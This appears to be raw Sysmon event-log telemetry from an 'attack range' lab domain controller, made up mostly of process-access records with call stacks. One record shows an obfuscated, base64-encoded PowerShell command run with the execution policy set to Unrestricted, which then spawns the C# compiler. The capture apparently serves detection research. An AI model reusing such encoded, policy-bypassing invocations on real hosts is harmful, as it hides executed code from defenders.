15:52:09.390{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003272Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:09.390{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003271Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:09.390{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003270Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:09.390{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003269Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:09.390{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003268Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:09.390{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003267Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:09.390{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003266Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:09.390{D28789B6-7C62-5FA1-0500-000000008801}6442432C:\Windows\system32\csrss.exe{D28789B6-7CA9-5FA1-9D00-000000008801}4408C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003265Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:09.390{D28789B6-7CA8-5FA1-9B00-000000008801}46441744C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7CA9-5FA1-9D00-000000008801}4408C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+270222|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26fe9f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26f9ee|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26f97a|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26e48b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+7c1edb|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+7c19a9|UNKNOWN(00007FF8DCA1B68F) 154100x80000000000000003264Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:09.402{D28789B6-7CA9-5FA1-9D00-000000008801}4408C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe4.7.2053.0 built by: NET47REL1Visual C# Command Line CompilerMicrosoft® .NET FrameworkMicrosoft Corporationcsc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\ADMINI~1\AppData\Local\Temp\lz4brytq.cmdline"C:\Users\Administrator\ATTACKRANGE\Administrator{D28789B6-7CA7-5FA1-A343-060000000000}0x643a30HighMD5=4360A98D8785625667D2574D2DD5C988,SHA256=F7DB25AA420C14C514690C1E943EC1E729596973E911B3445DFAD42FE958711D,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52{D28789B6-7CA8-5FA1-9B00-000000008801}4644C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA== 11241100x80000000000000003263Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:09.390{D28789B6-7CA8-5FA1-9B00-000000008801}4644C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\lz4brytq.cmdline2020-11-03 15:52:09.390 11241100x80000000000000003262Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:09.390{D28789B6-7CA8-5FA1-9B00-000000008801}4644C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\lz4brytq.dll2020-11-03 15:52:09.390 10341000x80000000000000003419Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:10.815{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003418Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:10.815{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003417Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:10.815{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000003416Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:10.799{D28789B6-7CAA-5FA1-A500-000000008801}2564C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\Administrator\AppData\Local\Temp\ukrnp45s.dll2020-11-03 15:52:10.690 10341000x80000000000000003415Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:10.784{D28789B6-7CA9-5FA1-A000-000000008801}46365092C:\Windows\system32\conhost.exe{D28789B6-7CAA-5FA1-A600-000000008801}2392C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003414Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:10.784{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003413Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:10.784{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003412Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:10.784{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003411Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:10.784{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003410Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:10.784{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003409Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:10.784{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003408Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:10.784{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003407Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:10.784{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003406Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:10.784{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 